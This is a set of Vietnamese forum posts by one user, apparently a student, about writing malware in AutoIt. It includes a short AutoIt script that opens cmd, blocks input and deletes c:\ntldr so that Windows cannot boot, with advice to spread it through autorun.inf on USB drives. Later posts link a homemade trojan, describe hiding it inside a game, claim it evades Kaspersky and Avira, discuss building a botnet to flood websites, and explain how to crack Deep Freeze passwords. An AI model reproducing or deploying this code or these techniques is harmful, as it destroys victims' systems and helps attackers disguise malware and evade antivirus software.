Messages posted by: handaewoo

thienhavodinh wrote:

Em là một mem mới của diễn đàn. Em viết bài này để hỏi các pro về cách viết một con trojan bằng Autoit.

nếu ông anh muốn viết 1 đoạn code mang tính phá hoại thì em có ý này . Ta sẽ cho nó khởi động cmd rồi cho nó del cái ntldr --> khỏi khởi động window smilie

Code:

run ( "cmd" )
BlockInput(1)
WinActivate("[CLASS:ConsoleWindowClass]", "")
send ( " attrib -s -h -r c:\ntldr " )
send ( "{enter}" )
send ( " del c:\ntldr " )
send ( " {enter} " )
send ( "exit" )
send ( "{enter}" )
processclose("cmd.exe")
BlockInput(0)

đoạn code trên dựa trên sự gợi ý của anh misa_qn , đàn em vô cùng cảm ơn
đoạn code trên có ưu điểm là sử dụng cmd để del ntldr nên ít có khả năng bị AV chặn . Nhưng nó không có autorun,muốn autorun thì chỉ có nước làm 1 file autorun.inf rồi quẳng vào USB, cho bác nào dính ráng chịu, chỉ chạy khi click , không có khả năng khởi động cùng window , lại chỉ có vài dòng cộc lốc thì mình gọi là trojan thì chắc người khác cười vỡ bụng . Dù sao thì cũng nhờ các bậc cây cao bóng cả chỉ giáo thêm

bolzano_1989 wrote:

Quay lại với chủ đề topic: handaewoo thử phát triển tính năng thu lại nội dung các cuộc Voice Chat bằng Skype bằng AutoIt xem sao .

cám ơn anh bolzano , em chỉ muốn phát triển nó theo hướng botnet còn về chức năng theo dõi máy tính thì em không biết nên chẳng biết làm sao

tmd wrote:

), BOTNET là 1 đám mật mã AUTOIT.

ông anh định nghĩa cái gì thế

thấy ông anh cũng mắc lỗi như em đây thì ông anh lên tiếng chỉ trích làm cái quái gì

đàn em đây có cảm giác là ông anh tmd "chỉ trích" em handaewoo đây như "chỉ trích" chính mình ấy nhỉ , em thấy ông anh cũng hay " sưu tầm " những thứ chỉ chạy được trên windows explorer rồi show cho anh em coi lắm mà /hvaonline/posts/list/13854.html
Xin lỗi vì đã đào bới topic ( Em nói có gì sai mong các anh bỏ qua )

tmd wrote:

Thảo luận về thứ sưu tầm nha các vị, Chứ không phải kiệt tác của người lập topic, cho nên thảo luận gì hay hay tí.

chẳng biết kiếp trước có nợ nần gì với bác này thế không biết . Nếu bác không thích thảo luận về vấn đề mà bác cho là sưu tầm nhưng không chỉ ra thằng em đây lấy từ nguồn nào (hay đây chỉ là sự võ đoán của bác).Bác muốn chứng minh rằng em đây chôm của người khác thì mời bác cứ tự nhiên lên google mà search thử xem cái mớ trên kia có trên trang web nào đó không, nói như bác thì em đây không phục .

narita11188 wrote:

ý bạn bảo mất lòng là thế nào. Nó lắp vào máy để phá hoại người ta, mà gọi là có ích cho xã hội ah ?

anh nóng tính quá smilie

. Ý em là tùy mục đích người sử dụng mà thôi . VD : Anh conmale từng nói với em rằng botnet chẳng có gì hay , theo như em hiểu ý của anh conmale là : botnet chỉ mang tính phá hoại , chẳng được lợi ích gì.Nhưng nếu em dùng nó để flood web đen thì sao?? .
Em tuổi trẻ nông nổi ,có nói gì sai , mong các anh rộng lượng bỏ qua cho

freeze_love wrote:

VBF đã giải tán? Bên HCE mới thông báo VBF open trở lại (đã khoảng mấy tháng rồi), vài hôm sau (vài hôm sau của mấy tháng trước khi đọc ở HCE) thì VBF die thật.
=> Có ai biết link mới của VBF là gì không? CHứ mình ko tin VBF die (lý do là bên HCE thông báo VBF open lại thế mà die thật à? )

đàn em đây đã thử search trên google từ vnbrain --> vào được trang VBF , nhưng không đăng nhập được

đúng là iloveyou còn chạy trên task , muốn tắt chỉ cần endprocess . Đây cũng là điểm yếu cần khắc phục

Khà khà , công nhận anh misa_qn tìm được cái code hay thật , để đàn em đem về ngâm cứu thử .
còn anh narita nói gì thấy mất lòng nhau quá vậy

narita11188 wrote:

nhục thật . Virus bachkhoadanang . 1 lũ đựoc đi học mà không có học. Lũ điên làm ra virus phá hoại làm cái gì cơ chứ. Giúp còn hok xong. Còn đi phá

các bác ai cũng nóng tính thế . Theo em thì anh hoangtu_giabang2006 nếu muốn sửa cái máy bị sality thì khỏe nhất là đi ghost rồi update AV . Còn về việc phòng chống thì mấy anh ở trên cũng nói rồi

xin bổ sung
http://tracuu.org/showthread.php?t=262
cách viết virus thì ở đâu chả có , chẳng chịu học lập trình , chỉ muốn viết cho nhanh , cho đơn giản thì cuối cùng cái con virus mình tạo ra cũng giống như " 1 file có chứng năng autorun " thậm chí AV cũng chẳng thèm diệt

bàn về viết virus sao mấy anh nói chuyện giống môn giáo dục công dân quá . Theo em thì ai cũng có thể viết virus , còn chuyện viết virus đơn giản là không thể , viết virus đơn giản thì thà lấy code của các tiền bối đi trước rồi sao chép nguyên xi cho xong

chỉ nguy hiểm với các mainboard support usb thôi anh . Mà hình như đối với DF version dưới 6. thì sửa lại ngày tháng trên Bios cũng phá băng được ( mới nghe thôi chứ chưa test )

phải copy trên MSDos và paste trên MsDos bởi vì ( theo em biết ) là DF không chạy trên dos.

anh phải dùng hirenboot để copy cái $Persi0 đó mới được , trên win không ăn thua

chương trình scanner vậy nó scan cái gì hả anh trandiepbang

link bị sao ấy , không thấy gì cả

khà khà , ai bảo anh xài win chùa lại còn mò lên trang web của microsoft nó check bản quyền là đúng rồi . Em thấy anh nên ghost là chắc ăn nhất

anh lấy cái file $Persi0 ở ổ C thay bằng cái $Persi0 khác

em mới học 11 nên chỉ biết viết tới như thế thôi . Anh có cao kiến gì thì xin chỉ giáo smilie

-chọn 1 phiên bản đóng băng trùng với bản đóng băng mà anh muốn phá cài lên 1 máy khác , đặt pass rồi copy cái bản cài đó đè lên cái bản mà anh muốn phá pass . muốn phá băng thì chỉ cần nhập cái pass kia vào là ok

ver mới nhất cảu em iloveyou . thêm chức năng cấm xóa trên window
http://www.mediafire.com/?xwivjemrjlo

Để chắc ăn em đã thử gắn em iloveyou trên vào 1 cái game bắn thiên thạch ( hình như của author Sakura ). Ngụy trang cẩn thận , chỉ cần ai đó click vào là ok

báo cáo các anh là em đã vô hiệu KIS thành công .Không những KIS mà AVIRA cũng không phát hiện ( nhưng em chưa làm cho nó ẩn hoàn toàn và chỉ active khi double click )
http://www.mediafire.com/?lrwmdmjg5mz

greenbirdnest wrote:

Không ( với autoIT ).

Have fun!

nghĩa là sao hả anh

thế anh có cách nào để Kis không "luộc" con malware không

dù sao thì em cũng lỡ post rồi nên xin anh cho ý kiến